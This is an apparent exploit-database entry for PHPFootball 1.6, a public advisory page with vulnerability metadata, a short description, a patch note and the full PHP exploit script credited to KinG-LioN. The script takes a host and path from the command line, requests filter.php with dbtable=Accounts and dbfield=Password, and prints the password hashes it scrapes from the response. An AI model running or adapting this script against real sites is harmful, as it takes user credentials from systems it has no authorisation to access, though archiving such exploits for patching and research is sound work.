PHPFootball - exploit.company

vendor:

PHPFootball

by:

KinG-LioN

7.5

CVSS

HIGH

Remote Hash Disclosure

CWE

Product Name: PHPFootball

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: a:phpfootball:phpfootball

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit

This exploit allows a remote attacker to disclose the hashes of the passwords stored in the database of the vulnerable application. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'dbfield' parameter of the 'filter.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script and view the hashes of the passwords stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

<?php

// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip

$host = $argv[1];
$path = $argv[2];

if ($argc != 3) {
    
    echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";
    echo "by KinG-LioN - http://eurohackers.it\n";
    echo "Usage: php {$argv[0]} <host> <path>\n";
    exit;
}
else {

   $head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";
   $head .= "Host: {$host}\r\n";
   $head .= "Connection: close\r\n\r\n";
   
   $fsock = fsockopen ($host,80);
   fputs ($fsock,$head);
   
   while (!feof($fsock)) {
     $cont .= fgets($fsock);
   } 
    fclose($fsock); 
    
    if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {
        print_r($i[1]);
   } 
   else {
       die ("exploit error\n");
   }
}


?>

# milw0rm.com [2009-01-01]